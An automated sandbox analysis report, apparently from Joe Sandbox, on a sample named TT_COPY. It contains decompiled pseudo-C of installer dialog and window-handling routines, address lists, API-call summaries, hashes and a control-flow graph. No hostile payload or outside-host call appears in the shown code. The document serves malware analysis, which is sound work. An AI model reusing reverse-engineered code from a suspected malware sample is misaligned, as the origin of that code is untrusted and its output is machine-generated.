                                                                                                                            						if(_t34 != 1) {
                                                                                                                            							L35:
                                                                                                                            							__eflags =  *_t133 - _t136;
                                                                                                                            							if( *_t133 == _t136) {
                                                                                                                            								goto L63;
                                                                                                                            							}
                                                                                                                            							goto L36;
                                                                                                                            						}
                                                                                                                            						_push(0);
                                                                                                                            						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                                                                            						__eflags = _t86;
                                                                                                                            						if(_t86 == 0) {
                                                                                                                            							goto L35;
                                                                                                                            						}
                                                                                                                            						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                                                                                                                            						__eflags =  *0x433ecc;
                                                                                                                            						return 0 |  *0x433ecc == 0x00000000;
                                                                                                                            					}
                                                                                                                            				} else {
                                                                                                                            					_t127 = _a4;
                                                                                                                            					_t136 = 0;
                                                                                                                            					if(_t130 == 0x47) {
                                                                                                                            						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                                                                                                                            					}
                                                                                                                            					_t122 = _a12;
                                                                                                                            					if(_t130 != 5) {
                                                                                                                            						L8:
                                                                                                                            						if(_t130 != 0x40d) {
                                                                                                                            							__eflags = _t130 - 0x11;
                                                                                                                            							if(_t130 != 0x11) {
                                                                                                                            								__eflags = _t130 - 0x111;
                                                                                                                            								if(_t130 != 0x111) {
                                                                                                                            									goto L28;
                                                                                                                            								}
                                                                                                                            								_t135 = _t122 & 0x0000ffff;
                                                                                                                            								_t128 = GetDlgItem(_t127, _t135);
                                                                                                                            								__eflags = _t128 - _t136;
                                                                                                                            								if(_t128 == _t136) {
                                                                                                                            									L15:
                                                                                                                            									__eflags = _t135 - 1;
                                                                                                                            									if(_t135 != 1) {
                                                                                                                            										__eflags = _t135 - 3;
                                                                                                                            										if(_t135 != 3) {
                                                                                                                            											_t129 = 2;
                                                                                                                            											__eflags = _t135 - _t129;
                                                                                                                            											if(_t135 != _t129) {
                                                                                                                            												L27:
                                                                                                                            												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                                                                                                                            												goto L28;
                                                                                                                            											}
                                                                                                                            											__eflags =  *0x434f8c - _t136;
                                                                                                                            											if( *0x434f8c == _t136) {
                                                                                                                            												_t99 = E0040140B(3);
                                                                                                                            												__eflags = _t99;
                                                                                                                            												if(_t99 != 0) {
                                                                                                                            													goto L28;
                                                                                                                            												}
                                                                                                                            												 *0x42ba38 = 1;
                                                                                                                            												L23:
                                                                                                                            												_push(0x78);
                                                                                                                            												L24:
                                                                                                                            												E00404472();
                                                                                                                            												goto L28;
                                                                                                                            											}
                                                                                                                            											E0040140B(_t129);
                                                                                                                            											 *0x42ba38 = _t129;
                                                                                                                            											goto L23;
                                                                                                                            										}
                                                                                                                            										__eflags =  *0x40a368 - _t136; // 0x0
                                                                                                                            										if(__eflags <= 0) {
                                                                                                                            											goto L27;
                                                                                                                            										}
                                                                                                                            										_push(0xffffffff);
                                                                                                                            										goto L24;
                                                                                                                            									}
                                                                                                                            									_push(_t135);
                                                                                                                            									goto L24;
                                                                                                                            								}
                                                                                                                            								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                                                                                            								_t103 = IsWindowEnabled(_t128);
                                                                                                                            								__eflags = _t103;
                                                                                                                            								if(_t103 == 0) {
                                                                                                                            									L63:
                                                                                                                            									return 0;
                                                                                                                            								}
                                                                                                                            								goto L15;
                                                                                                                            							}
                                                                                                                            							SetWindowLongW(_t127, _t136, _t136);
                                                                                                                            							return 1;
                                                                                                                            						}
                                                                                                                            						DestroyWindow( *0x433ed8);
                                                                                                                            						 *0x433ed8 = _t122;
                                                                                                                            						L60:
                                                                                                                            						if( *0x42f268 == _t136 &&  *0x433ed8 != _t136) {
                                                                                                                            							ShowWindow(_t127, 0xa);
                                                                                                                            							 *0x42f268 = 1;
                                                                                                                            						}
                                                                                                                            						goto L63;
                                                                                                                            					} else {
                                                                                                                            						asm("sbb eax, eax");
                                                                                                                            						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                                                                                                                            						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                                                                                            							L28:
                                                                                                                            							return E00404500(_a8, _t122, _a16);
                                                                                                                            						} else {
                                                                                                                            							ShowWindow(_t127, 4);
                                                                                                                            							goto L8;
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            			}































                                                                                                                            0x00403fa5
                                                                                                                            0x00403fac
                                                                                                                            0x00404113
                                                                                                                            0x00404117
                                                                                                                            0x0040411b
                                                                                                                            0x0040411d
                                                                                                                            0x00404122
                                                                                                                            0x0040412d
                                                                                                                            0x00404138
                                                                                                                            0x0040413d
                                                                                                                            0x0040413f
                                                                                                                            0x00404141
                                                                                                                            0x00404144
                                                                                                                            0x00404149
                                                                                                                            0x00404157
                                                                                                                            0x00404164
                                                                                                                            0x0040416b
                                                                                                                            0x0040416b
                                                                                                                            0x0040416c
                                                                                                                            0x0040416c
                                                                                                                            0x00404171
                                                                                                                            0x00404177
                                                                                                                            0x0040417e
                                                                                                                            0x00404184
                                                                                                                            0x00404186
                                                                                                                            0x004041c6
                                                                                                                            0x004041cb
                                                                                                                            0x004041d0
                                                                                                                            0x004041d0
                                                                                                                            0x004041d5
                                                                                                                            0x004041de
                                                                                                                            0x004041e0
                                                                                                                            0x004041e5
                                                                                                                            0x004041eb
                                                                                                                            0x004041ef
                                                                                                                            0x004041ef
                                                                                                                            0x004041f4
                                                                                                                            0x004041fa
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404205
                                                                                                                            0x0040420b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404214
                                                                                                                            0x0040421c
                                                                                                                            0x00404221
                                                                                                                            0x00404224
                                                                                                                            0x0040422a
                                                                                                                            0x0040422f
                                                                                                                            0x00404232
                                                                                                                            0x00404238
                                                                                                                            0x0040423d
                                                                                                                            0x00404240
                                                                                                                            0x00404246
                                                                                                                            0x0040424e
                                                                                                                            0x00404254
                                                                                                                            0x0040425a
                                                                                                                            0x0040425e
                                                                                                                            0x00404265
                                                                                                                            0x00404265
                                                                                                                            0x00404265
                                                                                                                            0x0040426f
                                                                                                                            0x00404281
                                                                                                                            0x0040428d
                                                                                                                            0x00404292
                                                                                                                            0x0040429c
                                                                                                                            0x004042a2
                                                                                                                            0x004042a4
                                                                                                                            0x004042a9
                                                                                                                            0x004042a6
                                                                                                                            0x004042a6
                                                                                                                            0x004042a6
                                                                                                                            0x004042b9
                                                                                                                            0x004042d1
                                                                                                                            0x004042d3
                                                                                                                            0x004042d9
                                                                                                                            0x004042ee
                                                                                                                            0x004042db
                                                                                                                            0x004042e4
                                                                                                                            0x004042e6
                                                                                                                            0x004042e6
                                                                                                                            0x004042f4
                                                                                                                            0x00404305
                                                                                                                            0x0040431b
                                                                                                                            0x00404322
                                                                                                                            0x00404328
                                                                                                                            0x0040432c
                                                                                                                            0x00404331
                                                                                                                            0x00404333
                                                                                                                            0x00000000
                                                                                                                            0x00404339
                                                                                                                            0x00404339
                                                                                                                            0x0040433b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404341
                                                                                                                            0x00404345
                                                                                                                            0x0040436a
                                                                                                                            0x00404370
                                                                                                                            0x00404376
                                                                                                                            0x00404378
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040439e
                                                                                                                            0x004043a4
                                                                                                                            0x004043a6
                                                                                                                            0x004043ab
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004043b1
                                                                                                                            0x004043b4
                                                                                                                            0x004043b7
                                                                                                                            0x004043ce
                                                                                                                            0x004043da
                                                                                                                            0x004043f3
                                                                                                                            0x004043f9
                                                                                                                            0x004043fd
                                                                                                                            0x00404402
                                                                                                                            0x00404408
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404412
                                                                                                                            0x0040441d
                                                                                                                            0x00000000
                                                                                                                            0x0040441d
                                                                                                                            0x00404347
                                                                                                                            0x0040434d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404353
                                                                                                                            0x00404359
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040435f
                                                                                                                            0x00404333
                                                                                                                            0x0040442a
                                                                                                                            0x00404436
                                                                                                                            0x0040443d
                                                                                                                            0x00000000
                                                                                                                            0x00404188
                                                                                                                            0x00404188
                                                                                                                            0x0040418b
                                                                                                                            0x004041be
                                                                                                                            0x004041be
                                                                                                                            0x004041c0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004041c0
                                                                                                                            0x0040418d
                                                                                                                            0x00404191
                                                                                                                            0x00404196
                                                                                                                            0x00404198
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004041a8
                                                                                                                            0x004041b0
                                                                                                                            0x00000000
                                                                                                                            0x004041b6
                                                                                                                            0x00403fbe
                                                                                                                            0x00403fbe
                                                                                                                            0x00403fc2
                                                                                                                            0x00403fc7
                                                                                                                            0x00403fd6
                                                                                                                            0x00403fd6
                                                                                                                            0x00403fdc
                                                                                                                            0x00403fe3
                                                                                                                            0x00404027
                                                                                                                            0x0040402d
                                                                                                                            0x00404046
                                                                                                                            0x00404049
                                                                                                                            0x0040405c
                                                                                                                            0x00404062
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404068
                                                                                                                            0x00404073
                                                                                                                            0x00404075
                                                                                                                            0x00404077
                                                                                                                            0x00404096
                                                                                                                            0x00404096
                                                                                                                            0x00404099
                                                                                                                            0x0040409e
                                                                                                                            0x004040a1
                                                                                                                            0x004040b1
                                                                                                                            0x004040b2
                                                                                                                            0x004040b4
                                                                                                                            0x004040ea
                                                                                                                            0x004040fa
                                                                                                                            0x00000000
                                                                                                                            0x004040fa
                                                                                                                            0x004040b6
                                                                                                                            0x004040bc
                                                                                                                            0x004040d5
                                                                                                                            0x004040da
                                                                                                                            0x004040dc
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004040de
                                                                                                                            0x004040ca
                                                                                                                            0x004040ca
                                                                                                                            0x004040cc
                                                                                                                            0x004040cc
                                                                                                                            0x00000000
                                                                                                                            0x004040cc
                                                                                                                            0x004040bf
                                                                                                                            0x004040c4
                                                                                                                            0x00000000
                                                                                                                            0x004040c4
                                                                                                                            0x004040a3
                                                                                                                            0x004040a9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004040ab
                                                                                                                            0x00000000
                                                                                                                            0x004040ab
                                                                                                                            0x0040409b
                                                                                                                            0x00000000
                                                                                                                            0x0040409b
                                                                                                                            0x00404081
                                                                                                                            0x00404088
                                                                                                                            0x0040408e
                                                                                                                            0x00404090
                                                                                                                            0x00404466
                                                                                                                            0x00000000
                                                                                                                            0x00404466
                                                                                                                            0x00000000
                                                                                                                            0x00404090
                                                                                                                            0x0040404e
                                                                                                                            0x00000000
                                                                                                                            0x00404056
                                                                                                                            0x00404035
                                                                                                                            0x0040403b
                                                                                                                            0x00404443
                                                                                                                            0x00404449
                                                                                                                            0x00404456
                                                                                                                            0x0040445c
                                                                                                                            0x0040445c
                                                                                                                            0x00000000
                                                                                                                            0x00403fe5
                                                                                                                            0x00403fea
                                                                                                                            0x00403ff6
                                                                                                                            0x00403fff
                                                                                                                            0x00404100
                                                                                                                            0x00000000
                                                                                                                            0x0040401e
                                                                                                                            0x00404021
                                                                                                                            0x00000000
                                                                                                                            0x00404021
                                                                                                                            0x00403fff
                                                                                                                            0x00403fe3

                                                                                                                            APIs
                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                                                                            • ShowWindow.USER32(?), ref: 00403FF6
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                                                                            • DestroyWindow.USER32 ref: 00404035
                                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                                                                            • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                                                                            • EnableWindow.USER32(?,?), ref: 0040429C
                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                                                                            • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                                                                            • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 121052019-0
                                                                                                                            • Opcode ID: f65e638bec718107b599af9a82b264fc0764d6b1c1dffbdcb4ef221558e01a13
                                                                                                                            • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                                                                            • Opcode Fuzzy Hash: f65e638bec718107b599af9a82b264fc0764d6b1c1dffbdcb4ef221558e01a13
                                                                                                                            • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 250 403bec-403c04 call 40690a 253 403c06-403c16 call 406484 250->253 254 403c18-403c4f call 40640b 250->254 261 403c72-403c9b call 403ec2 call 405f14 253->261 259 403c51-403c62 call 40640b 254->259 260 403c67-403c6d lstrcatW 254->260 259->260 260->261 268 403ca1-403ca6 261->268 269 403d2d-403d35 call 405f14 261->269 268->269 270 403cac-403cd4 call 40640b 268->270 275 403d43-403d68 LoadImageW 269->275 276 403d37-403d3e call 40657a 269->276 270->269 277 403cd6-403cda 270->277 279 403de9-403df1 call 40140b 275->279 280 403d6a-403d9a RegisterClassW 275->280 276->275 282 403cec-403cf8 lstrlenW 277->282 283 403cdc-403ce9 call 405e39 277->283 292 403df3-403df6 279->292 293 403dfb-403e06 call 403ec2 279->293 284 403da0-403de4 SystemParametersInfoW CreateWindowExW 280->284 285 403eb8 280->285 289 403d20-403d28 call 405e0c call 40653d 282->289 290 403cfa-403d08 lstrcmpiW 282->290 283->282 284->279 288 403eba-403ec1 285->288 289->269 290->289 291 403d0a-403d14 GetFileAttributesW 290->291 296 403d16-403d18 291->296 297 403d1a-403d1b call 405e58 291->297 292->288 303 403e0c-403e26 ShowWindow call 40689a 293->303 304 403e8f-403e97 call 405672 293->304 296->289 296->297 297->289 311 403e32-403e44 GetClassInfoW 303->311 312 403e28-403e2d call 40689a 303->312 309 403eb1-403eb3 call 40140b 304->309 310 403e99-403e9f 304->310 309->285 310->292 313 403ea5-403eac call 40140b 310->313 316 403e46-403e56 GetClassInfoW RegisterClassW 311->316 317 403e5c-403e7f DialogBoxParamW call 40140b 311->317 312->311 313->292 316->317 320 403e84-403e8d call 403b3c 317->320 320->288
                                                                                                                            C-Code - Quality: 96%
                                                                                                                            			E00403BEC(void* __eflags) {
                                                                                                                            				intOrPtr _v4;
                                                                                                                            				intOrPtr _v8;
                                                                                                                            				int _v12;
                                                                                                                            				void _v16;
                                                                                                                            				void* __ebx;
                                                                                                                            				void* __edi;
                                                                                                                            				void* __esi;
                                                                                                                            				intOrPtr* _t22;
                                                                                                                            				void* _t30;
                                                                                                                            				void* _t32;
                                                                                                                            				int _t33;
                                                                                                                            				void* _t36;
                                                                                                                            				int _t39;
                                                                                                                            				int _t40;
                                                                                                                            				int _t44;
                                                                                                                            				short _t63;
                                                                                                                            				WCHAR* _t65;
                                                                                                                            				signed char _t69;
                                                                                                                            				WCHAR* _t76;
                                                                                                                            				intOrPtr _t82;
                                                                                                                            				WCHAR* _t87;
                                                                                                                            
                                                                                                                            				_t82 =  *0x434f10;
                                                                                                                            				_t22 = E0040690A(2);
                                                                                                                            				_t90 = _t22;
                                                                                                                            				if(_t22 == 0) {
                                                                                                                            					_t76 = 0x42d268;
                                                                                                                            					L"1033" = 0x30;
                                                                                                                            					 *0x442002 = 0x78;
                                                                                                                            					 *0x442004 = 0;
                                                                                                                            					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                                                                                                                            					__eflags =  *0x42d268;
                                                                                                                            					if(__eflags == 0) {
                                                                                                                            						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                                                                                                                            					}
                                                                                                                            					lstrcatW(L"1033", _t76);
                                                                                                                            				} else {
                                                                                                                            					E00406484(L"1033",  *_t22() & 0x0000ffff);
                                                                                                                            				}
                                                                                                                            				E00403EC2(_t78, _t90);
                                                                                                                            				 *0x434f80 =  *0x434f18 & 0x00000020;
                                                                                                                            				 *0x434f9c = 0x10000;
                                                                                                                            				if(E00405F14(_t90, 0x440800) != 0) {
                                                                                                                            					L16:
                                                                                                                            					if(E00405F14(_t98, 0x440800) == 0) {
                                                                                                                            						E0040657A(_t76, 0, _t82, 0x440800,  *((intOrPtr*)(_t82 + 0x118)));
                                                                                                                            					}
                                                                                                                            					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                                                            					 *0x433ee8 = _t30;
                                                                                                                            					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                                                                            						L21:
                                                                                                                            						if(E0040140B(0) == 0) {
                                                                                                                            							_t32 = E00403EC2(_t78, __eflags);
                                                                                                                            							__eflags =  *0x434fa0;
                                                                                                                            							if( *0x434fa0 != 0) {
                                                                                                                            								_t33 = E00405672(_t32, 0);
                                                                                                                            								__eflags = _t33;
                                                                                                                            								if(_t33 == 0) {
                                                                                                                            									E0040140B(1);
                                                                                                                            									goto L33;
                                                                                                                            								}
                                                                                                                            								__eflags =  *0x433ecc;
                                                                                                                            								if( *0x433ecc == 0) {
                                                                                                                            									E0040140B(2);
                                                                                                                            								}
                                                                                                                            								goto L22;
                                                                                                                            							}
                                                                                                                            							ShowWindow( *0x42d248, 5); // executed
                                                                                                                            							_t39 = E0040689A("RichEd20"); // executed
                                                                                                                            							__eflags = _t39;
                                                                                                                            							if(_t39 == 0) {
                                                                                                                            								E0040689A("RichEd32");
                                                                                                                            							}
                                                                                                                            							_t87 = L"RichEdit20W";
                                                                                                                            							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                                                                                                                            							__eflags = _t40;
                                                                                                                            							if(_t40 == 0) {
                                                                                                                            								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                                                                                                                            								 *0x433ec4 = _t87;
                                                                                                                            								RegisterClassW(0x433ea0);
                                                                                                                            							}
                                                                                                                            							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
                                                                                                                            							E00403B3C(E0040140B(5), 1);
                                                                                                                            							return _t44;
                                                                                                                            						}
                                                                                                                            						L22:
                                                                                                                            						_t36 = 2;
                                                                                                                            						return _t36;
                                                                                                                            					} else {
                                                                                                                            						_t78 =  *0x434f00;
                                                                                                                            						 *0x433ea4 = E00401000;
                                                                                                                            						 *0x433eb0 =  *0x434f00;
                                                                                                                            						 *0x433eb4 = _t30;
                                                                                                                            						 *0x433ec4 = 0x40a380;
                                                                                                                            						if(RegisterClassW(0x433ea0) == 0) {
                                                                                                                            							L33:
                                                                                                                            							__eflags = 0;
                                                                                                                            							return 0;
                                                                                                                            						}
                                                                                                                            						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                                                                            						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                                                                                                                            						goto L21;
                                                                                                                            					}
                                                                                                                            				} else {
                                                                                                                            					_t78 =  *(_t82 + 0x48);
                                                                                                                            					_t92 = _t78;
                                                                                                                            					if(_t78 == 0) {
                                                                                                                            						goto L16;
                                                                                                                            					}
                                                                                                                            					_t76 = 0x432ea0;
                                                                                                                            					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                                                                                                                            					_t63 =  *0x432ea0; // 0x43
                                                                                                                            					if(_t63 == 0) {
                                                                                                                            						goto L16;
                                                                                                                            					}
                                                                                                                            					if(_t63 == 0x22) {
                                                                                                                            						_t76 = 0x432ea2;
                                                                                                                            						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                                                                                                                            					}
                                                                                                                            					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                                                                            					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                                                                            						L15:
                                                                                                                            						E0040653D(0x440800, E00405E0C(_t76));
                                                                                                                            						goto L16;
                                                                                                                            					} else {
                                                                                                                            						_t69 = GetFileAttributesW(_t76);
                                                                                                                            						if(_t69 == 0xffffffff) {
                                                                                                                            							L14:
                                                                                                                            							E00405E58(_t76);
                                                                                                                            							goto L15;
                                                                                                                            						}
                                                                                                                            						_t98 = _t69 & 0x00000010;
                                                                                                                            						if((_t69 & 0x00000010) != 0) {
                                                                                                                            							goto L15;
                                                                                                                            						}
                                                                                                                            						goto L14;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            			}
























                                                                                                                            0x00403bf2
                                                                                                                            0x00403bfb
                                                                                                                            0x00403c02
                                                                                                                            0x00403c04
                                                                                                                            0x00403c18
                                                                                                                            0x00403c2a
                                                                                                                            0x00403c33
                                                                                                                            0x00403c3c
                                                                                                                            0x00403c43
                                                                                                                            0x00403c48
                                                                                                                            0x00403c4f
                                                                                                                            0x00403c62
                                                                                                                            0x00403c62
                                                                                                                            0x00403c6d
                                                                                                                            0x00403c06
                                                                                                                            0x00403c11
                                                                                                                            0x00403c11
                                                                                                                            0x00403c72
                                                                                                                            0x00403c85
                                                                                                                            0x00403c8a
                                                                                                                            0x00403c9b
                                                                                                                            0x00403d2d
                                                                                                                            0x00403d35
                                                                                                                            0x00403d3e
                                                                                                                            0x00403d3e
                                                                                                                            0x00403d54
                                                                                                                            0x00403d5a
                                                                                                                            0x00403d68
                                                                                                                            0x00403de9
                                                                                                                            0x00403df1
                                                                                                                            0x00403dfb
                                                                                                                            0x00403e00
                                                                                                                            0x00403e06
                                                                                                                            0x00403e90
                                                                                                                            0x00403e95
                                                                                                                            0x00403e97
                                                                                                                            0x00403eb3
                                                                                                                            0x00000000
                                                                                                                            0x00403eb3
                                                                                                                            0x00403e99
                                                                                                                            0x00403e9f
                                                                                                                            0x00403ea7
                                                                                                                            0x00403ea7
                                                                                                                            0x00000000
                                                                                                                            0x00403e9f
                                                                                                                            0x00403e14
                                                                                                                            0x00403e1f
                                                                                                                            0x00403e24
                                                                                                                            0x00403e26
                                                                                                                            0x00403e2d
                                                                                                                            0x00403e2d
                                                                                                                            0x00403e38
                                                                                                                            0x00403e40
                                                                                                                            0x00403e42
                                                                                                                            0x00403e44
                                                                                                                            0x00403e4d
                                                                                                                            0x00403e50
                                                                                                                            0x00403e56
                                                                                                                            0x00403e56
                                                                                                                            0x00403e75
                                                                                                                            0x00403e86
                                                                                                                            0x00000000
                                                                                                                            0x00403e8b
                                                                                                                            0x00403df3
                                                                                                                            0x00403df5
                                                                                                                            0x00000000
                                                                                                                            0x00403d6a
                                                                                                                            0x00403d6a
                                                                                                                            0x00403d76
                                                                                                                            0x00403d80
                                                                                                                            0x00403d86
                                                                                                                            0x00403d8b
                                                                                                                            0x00403d9a
                                                                                                                            0x00403eb8
                                                                                                                            0x00403eb8
                                                                                                                            0x00000000
                                                                                                                            0x00403eb8
                                                                                                                            0x00403da9
                                                                                                                            0x00403de4
                                                                                                                            0x00000000
                                                                                                                            0x00403de4
                                                                                                                            0x00403ca1
                                                                                                                            0x00403ca1
                                                                                                                            0x00403ca4
                                                                                                                            0x00403ca6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403cb4
                                                                                                                            0x00403cc6
                                                                                                                            0x00403ccb
                                                                                                                            0x00403cd4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403cda
                                                                                                                            0x00403cdc
                                                                                                                            0x00403ce9
                                                                                                                            0x00403ce9
                                                                                                                            0x00403cf2
                                                                                                                            0x00403cf8
                                                                                                                            0x00403d20
                                                                                                                            0x00403d28
                                                                                                                            0x00000000
                                                                                                                            0x00403d0a
                                                                                                                            0x00403d0b
                                                                                                                            0x00403d14
                                                                                                                            0x00403d1a
                                                                                                                            0x00403d1b
                                                                                                                            0x00000000
                                                                                                                            0x00403d1b
                                                                                                                            0x00403d16
                                                                                                                            0x00403d18
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403d18
                                                                                                                            0x00403cf8

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                              • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                            • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75DF3420), ref: 00403CED
                                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                                                                            • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00440800), ref: 00403D54
                                                                                                                              • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                                                            • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                                                                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                                                                            • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
